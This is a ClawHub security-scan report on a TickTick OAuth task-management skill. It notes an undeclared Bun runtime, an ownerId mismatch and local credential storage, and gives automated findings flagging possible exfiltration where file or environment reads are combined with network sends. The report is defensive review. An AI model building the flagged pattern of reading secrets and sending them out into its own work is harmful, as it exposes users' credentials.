Skill flagged — suspicious patterns detected
ClawHub Security flagged this skill as suspicious. Review the scan results before using.
Download zip
LicenseMIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
OpenClaw
Suspicious
medium confidencePurpose & Capability
Functionality (OAuth flow, calling api.ticktick.com, listing/creating/updating tasks/projects) matches the declared purpose. However, the skill's runtime implicitly requires the 'bun' runtime (scripts use bun shebang and SKILL.md instructs 'bun run ...') but the registry metadata lists no required binaries — that's an inconsistency. Also the package/_meta ownerId in files differs from the registry ownerId, which is unusual and worth verifying with the publisher.
Instruction Scope
SKILL.md and the code confine behavior to task/project management via the TickTick API. The instructions ask you to run an OAuth flow and the code only reads/writes config and credential files under the user's home directory (e.g., ~/.clawdbot/credentials/ticktick-cli and ~/.config/ticktick-skill) and contacts api.ticktick.com. There are no instructions to read unrelated system files or to send data to third-party endpoints beyond TickTick.
Install Mechanism
There is no install spec (instruction-only), which is low risk, but the skill ships many TypeScript files and a package.json/package-lock with dependencies. Without an install step, execution depends on the host having the appropriate runtime (Bun) and possibly those dependencies. That mismatch (no declared binary but code assuming 'bun') is a coherence issue: the skill may fail or require manual installation steps, and bundling many dependencies with no automated install increases friction and potential for user mistakes.
Credentials
The skill requests no environment variables or external credentials via registry metadata; at runtime it requires an OAuth client_id and client_secret (saved locally) to access TickTick, which is appropriate for the stated purpose. It writes tokens and config under the user's home directory with file permissions set to restrict access (mode 0700 for dir, 0600 for file), which is proportional and expected.
Persistence & Privilege
The skill does not request always:true and is user-invocable only. It stores its own credentials/config in user-local directories, creates a short-lived local HTTP server during OAuth (listening on localhost:8080) and does not modify other skills or global agent settings. These behaviors are typical for an OAuth-enabled CLI.
What to consider before installing
What to consider before installing:
- Runtime requirement: The code and SKILL.md assume the 'bun' runtime (shebangs and 'bun run' commands). The registry lists no required binaries. If you don't have Bun, the skill will likely fail or require manual setup. Confirm whether you are comfortable installing Bun or adjusting the skill to use your environment.
- Credentials & storage: You will need to provide a TickTick OAuth client_id and client_secret during initial setup. These are stored under ~/.clawdbot/credentials/ticktick-cli/config.json (file permissions are set to be restrictive). Ensure you trust the skill author before storing OAuth credentials locally.
- Metadata mismatch: The embedded _meta.json ownerId differs from the registry Owner ID. This could be an innocuous packaging oversight, but it's worth verifying the publisher/source before granting access to your TickTick account.
- Dependencies & install: The repository includes package.json and package-lock.json (many npm deps). There is no install spec, so you may need to manually install dependencies or ensure Bun supports running the TypeScript files as-is. Manual installation increases risk of mistakes — prefer a skill that documents required runtime and install steps.
- Local OAuth server: The skill spins up a temporary localhost server to complete OAuth. This is normal for CLI OAuth flows, but be aware it listens on 127.0.0.1:8080 during auth and will open a browser. Ensure you only accept the OAuth redirect you initiated.
- Review before running: If you are not comfortable with the small inconsistencies above, ask the publisher for clarification or request a version that declares 'bun' as a required binary and confirms the ownerId/source. If you proceed, inspect the files locally (especially scripts/auth.ts and where credentials are saved) and consider running inside a controlled environment (container) first.scripts/commands/tasks.ts:34
Environment variable access combined with network send.
scripts/auth.ts:4
File read combined with network send (possible exfiltration).
Patterns worth reviewing
These patterns may indicate risky behavior. Check the VirusTotal and OpenClaw results above for context-aware analysis before installing.Like a lobster shell, security has layers — review code before you run it.
adhdvk972ygc1t603f35wsf5m3mtz6x83cvtylatestvk972ygc1t603f35wsf5m3mtz6x83cvtyproductivityvk972ygc1t603f35wsf5m3mtz6x83cvtytasksvk972ygc1t603f35wsf5m3mtz6x83cvty
License
MIT-0
Free to use, modify, and redistribute. No attribution required.